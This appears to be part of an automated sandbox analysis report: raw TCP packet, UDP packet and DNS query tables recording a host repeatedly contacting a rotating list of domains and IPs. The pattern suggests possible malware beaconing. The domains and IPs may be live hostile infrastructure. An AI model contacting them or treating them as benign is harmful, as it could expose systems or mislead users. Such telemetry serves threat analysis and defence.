Nov 11, 2024 06:52:54.411403894 CET	50048	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:54.557415009 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:54.563406944 CET	50048	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:55.065100908 CET	50048	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:56.084347963 CET	50049	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:56.089330912 CET	80	50049	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:56.090455055 CET	50049	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:56.099350929 CET	50049	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:56.104397058 CET	80	50049	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:56.902062893 CET	80	50049	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:57.080388069 CET	50049	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:57.246270895 CET	80	50049	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:57.246284962 CET	80	50049	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:57.246351004 CET	50049	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:57.247399092 CET	50049	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:57.252115965 CET	80	50049	38.47.233.52	192.168.2.4
Nov 11, 2024 06:53:02.364192963 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:02.369048119 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.369178057 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:02.382220030 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:02.387020111 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821063042 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821079969 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821089029 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821100950 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821106911 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821113110 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821125031 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:02.821156979 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:02.821240902 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821253061 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.821291924 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:02.822599888 CET	80	50050	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:02.822643995 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:03.904510975 CET	50050	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:04.913340092 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:04.918219090 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:04.918286085 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:04.931801081 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:04.936609983 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446135998 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446157932 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446168900 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446181059 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446192980 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446204901 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446211100 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:05.446216106 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446229935 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446240902 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:05.446243048 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446252108 CET	80	50051	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:05.446280003 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:05.446290970 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:06.440092087 CET	50051	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.460154057 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.465198994 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.465302944 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.481395006 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.486335039 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486350060 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486370087 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486378908 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486390114 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486510038 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486521006 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486531019 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.486541033 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961374044 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961389065 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961405993 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961417913 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961429119 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961440086 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961452007 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961457968 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.961467981 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.961535931 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.961535931 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:07.973211050 CET	80	50052	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:07.979501009 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:08.986651897 CET	50052	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:10.008003950 CET	50053	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:10.013365030 CET	80	50053	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:10.020073891 CET	50053	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:10.024059057 CET	50053	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:10.029196024 CET	80	50053	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:10.526686907 CET	80	50053	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:10.529459953 CET	80	50053	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:10.532110929 CET	50053	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:10.535986900 CET	50053	80	192.168.2.4	188.114.97.3
Nov 11, 2024 06:53:10.540824890 CET	80	50053	188.114.97.3	192.168.2.4
Nov 11, 2024 06:53:15.586482048 CET	50054	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:15.592216969 CET	80	50054	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:15.592313051 CET	50054	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:15.606410027 CET	50054	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:15.611327887 CET	80	50054	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:16.403508902 CET	80	50054	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:16.455857992 CET	50054	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:16.600718021 CET	80	50054	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:16.600902081 CET	50054	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:17.111470938 CET	50054	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:18.134480000 CET	50055	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:18.139436007 CET	80	50055	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:18.139607906 CET	50055	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:18.151802063 CET	50055	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:18.156663895 CET	80	50055	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:18.941437006 CET	80	50055	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:19.033236027 CET	50055	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:19.134845972 CET	80	50055	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:19.134910107 CET	50055	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:19.658257961 CET	50055	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:20.679747105 CET	50056	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:20.684684992 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.687886000 CET	50056	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:20.699773073 CET	50056	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:20.704693079 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704730034 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704739094 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704746962 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704766035 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704775095 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704837084 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704845905 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:20.704855919 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:21.489464045 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:21.533159018 CET	50056	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:21.689584017 CET	80	50056	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:21.689757109 CET	50056	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:22.205115080 CET	50056	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:23.225734949 CET	50057	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:23.230631113 CET	80	50057	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:23.230699062 CET	50057	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:23.240060091 CET	50057	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:23.244859934 CET	80	50057	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:24.020704031 CET	80	50057	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:24.067763090 CET	50057	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:24.208596945 CET	80	50057	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:24.215656996 CET	50057	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:24.217742920 CET	50057	80	192.168.2.4	38.55.215.72
Nov 11, 2024 06:53:24.222536087 CET	80	50057	38.55.215.72	192.168.2.4
Nov 11, 2024 06:53:29.399621010 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:29.404529095 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:29.404592037 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:29.415565014 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:29.420427084 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:30.214874029 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:30.267339945 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:30.413889885 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:30.415546894 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:30.923830986 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:31.943487883 CET	50059	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:31.948472977 CET	80	50059	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:31.955482960 CET	50059	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:31.967649937 CET	50059	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:31.972618103 CET	80	50059	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:32.765852928 CET	80	50059	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:32.815454006 CET	50059	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:32.965078115 CET	80	50059	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:32.965131044 CET	50059	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:33.470706940 CET	50059	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:34.489578962 CET	50060	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:34.494474888 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.495512009 CET	50060	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:34.507375956 CET	50060	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:34.512237072 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512260914 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512269974 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512284994 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512293100 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512428999 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512438059 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512453079 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:34.512460947 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:35.308845043 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:35.360953093 CET	50060	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:35.507675886 CET	80	50060	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:35.507812977 CET	50060	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:36.019399881 CET	50060	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:37.037725925 CET	50061	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:37.042864084 CET	80	50061	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:37.042973042 CET	50061	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:37.051178932 CET	50061	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:37.056078911 CET	80	50061	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:37.853766918 CET	80	50061	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:37.911334991 CET	50061	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:38.053173065 CET	80	50061	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:38.053396940 CET	50061	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:38.054291964 CET	50061	80	192.168.2.4	154.23.184.95
Nov 11, 2024 06:53:38.059076071 CET	80	50061	154.23.184.95	192.168.2.4
Nov 11, 2024 06:53:43.124495029 CET	50062	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:43.129441977 CET	80	50062	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:43.129504919 CET	50062	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:43.143295050 CET	50062	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:43.148195028 CET	80	50062	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:43.734839916 CET	80	50062	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:43.734891891 CET	80	50062	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:43.734955072 CET	50062	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:43.736546040 CET	80	50062	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:43.736608028 CET	50062	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:44.657690048 CET	50062	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:45.677793026 CET	50063	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:45.684284925 CET	80	50063	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:45.684357882 CET	50063	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:45.698045969 CET	50063	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:45.704387903 CET	80	50063	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:46.264085054 CET	80	50063	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:46.264106989 CET	80	50063	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:46.264188051 CET	50063	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:46.265798092 CET	80	50063	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:46.271178961 CET	50063	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:47.204515934 CET	50063	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:48.223323107 CET	50064	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:48.228323936 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.228457928 CET	50064	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:48.243124962 CET	50064	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:48.248219967 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248253107 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248281002 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248310089 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248337030 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248402119 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248429060 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248497963 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.248527050 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.808856964 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.808878899 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.809792995 CET	80	50064	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:48.809916019 CET	50064	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:49.751332998 CET	50064	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:50.771037102 CET	50065	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:50.776036024 CET	80	50065	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:50.779162884 CET	50065	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:50.787039042 CET	50065	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:50.791963100 CET	80	50065	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:51.371902943 CET	80	50065	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:51.371929884 CET	80	50065	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:51.372020960 CET	50065	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:51.373440027 CET	80	50065	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:51.373485088 CET	50065	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:51.375487089 CET	50065	80	192.168.2.4	172.67.217.176
Nov 11, 2024 06:53:51.380240917 CET	80	50065	172.67.217.176	192.168.2.4
Nov 11, 2024 06:53:56.714904070 CET	50066	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:56.719702959 CET	80	50066	206.119.82.172	192.168.2.4
Nov 11, 2024 06:53:56.720056057 CET	50066	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:56.730901003 CET	50066	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:56.735654116 CET	80	50066	206.119.82.172	192.168.2.4
Nov 11, 2024 06:53:57.530672073 CET	80	50066	206.119.82.172	192.168.2.4
Nov 11, 2024 06:53:57.579217911 CET	50066	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:57.729500055 CET	80	50066	206.119.82.172	192.168.2.4
Nov 11, 2024 06:53:57.729563951 CET	50066	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:58.236047029 CET	50066	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:59.253958941 CET	50067	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:59.258915901 CET	80	50067	206.119.82.172	192.168.2.4
Nov 11, 2024 06:53:59.258999109 CET	50067	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:59.271838903 CET	50067	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:53:59.276680946 CET	80	50067	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:00.069432974 CET	80	50067	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:00.110405922 CET	50067	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:00.268515110 CET	80	50067	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:00.268584967 CET	50067	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:00.782814980 CET	50067	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:01.801263094 CET	50068	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:01.806196928 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.806284904 CET	50068	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:01.817315102 CET	50068	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:01.822175026 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822185993 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822228909 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822237968 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822372913 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822381973 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822402000 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822412014 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:01.822459936 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:02.623016119 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:02.782246113 CET	50068	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:02.822685003 CET	80	50068	206.119.82.172	192.168.2.4
Nov 11, 2024 06:54:02.822738886 CET	50068	80	192.168.2.4	206.119.82.172
Nov 11, 2024 06:54:03.704132080 CET	50068	80	192.168.2.4	206.119.82.172

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 06:50:31.334460974 CET	59022	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:50:31.388427019 CET	53	59022	1.1.1.1	192.168.2.4
Nov 11, 2024 06:50:47.148138046 CET	65369	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:50:47.158796072 CET	53	65369	1.1.1.1	192.168.2.4
Nov 11, 2024 06:51:00.272526026 CET	50656	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:51:00.286614895 CET	53	50656	1.1.1.1	192.168.2.4
Nov 11, 2024 06:51:13.397914886 CET	58185	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:51:13.530462980 CET	53	58185	1.1.1.1	192.168.2.4
Nov 11, 2024 06:51:26.633430958 CET	63790	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:51:26.647816896 CET	53	63790	1.1.1.1	192.168.2.4
Nov 11, 2024 06:51:39.745625019 CET	53449	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:51:39.926743031 CET	53	53449	1.1.1.1	192.168.2.4
Nov 11, 2024 06:51:53.212189913 CET	59306	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:51:53.267417908 CET	53	59306	1.1.1.1	192.168.2.4
Nov 11, 2024 06:52:07.585465908 CET	61819	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:52:07.664774895 CET	53	61819	1.1.1.1	192.168.2.4
Nov 11, 2024 06:52:20.789320946 CET	59936	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:52:20.803515911 CET	53	59936	1.1.1.1	192.168.2.4
Nov 11, 2024 06:52:34.054919958 CET	57447	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:52:34.421690941 CET	53	57447	1.1.1.1	192.168.2.4
Nov 11, 2024 06:52:48.100564003 CET	55401	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:52:48.443121910 CET	53	55401	1.1.1.1	192.168.2.4
Nov 11, 2024 06:53:02.261639118 CET	58027	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:53:02.356408119 CET	53	58027	1.1.1.1	192.168.2.4
Nov 11, 2024 06:53:15.537396908 CET	59560	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:53:15.584079027 CET	53	59560	1.1.1.1	192.168.2.4
Nov 11, 2024 06:53:29.224426985 CET	50165	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:53:29.397358894 CET	53	50165	1.1.1.1	192.168.2.4
Nov 11, 2024 06:53:43.069972038 CET	53359	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:53:43.121646881 CET	53	53359	1.1.1.1	192.168.2.4
Nov 11, 2024 06:53:56.379472971 CET	55229	53	192.168.2.4	1.1.1.1
Nov 11, 2024 06:53:56.708976030 CET	53	55229	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 06:50:31.334460974 CET	192.168.2.4	1.1.1.1	0x4e2	Standard query (0)	www.berita-juli2024162.sbs	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:50:47.148138046 CET	192.168.2.4	1.1.1.1	0xf60e	Standard query (0)	www.innovators.group	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:00.272526026 CET	192.168.2.4	1.1.1.1	0x96ff	Standard query (0)	www.ulula.org	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:13.397914886 CET	192.168.2.4	1.1.1.1	0xa37d	Standard query (0)	www.havan-oficial.online	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:26.633430958 CET	192.168.2.4	1.1.1.1	0xfbaf	Standard query (0)	www.digitalincomenow.net	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:39.745625019 CET	192.168.2.4	1.1.1.1	0xc59	Standard query (0)	www.qadlo.life	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:53.212189913 CET	192.168.2.4	1.1.1.1	0xcbe3	Standard query (0)	www.electronify.shop	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:07.585465908 CET	192.168.2.4	1.1.1.1	0x5644	Standard query (0)	www.lowerbackpain.site	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:20.789320946 CET	192.168.2.4	1.1.1.1	0x58e1	Standard query (0)	www.mythkitchen.net	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:34.054919958 CET	192.168.2.4	1.1.1.1	0x3f2	Standard query (0)	www.36ded.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:48.100564003 CET	192.168.2.4	1.1.1.1	0x3a0a	Standard query (0)	www.2q33e.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:02.261639118 CET	192.168.2.4	1.1.1.1	0xa244	Standard query (0)	www.figa1digital.services	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:15.537396908 CET	192.168.2.4	1.1.1.1	0x99f0	Standard query (0)	www.7nz4.xyz	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:29.224426985 CET	192.168.2.4	1.1.1.1	0x25e3	Standard query (0)	www.wcp95.top	A (IP address)	IN (0x0001)	false
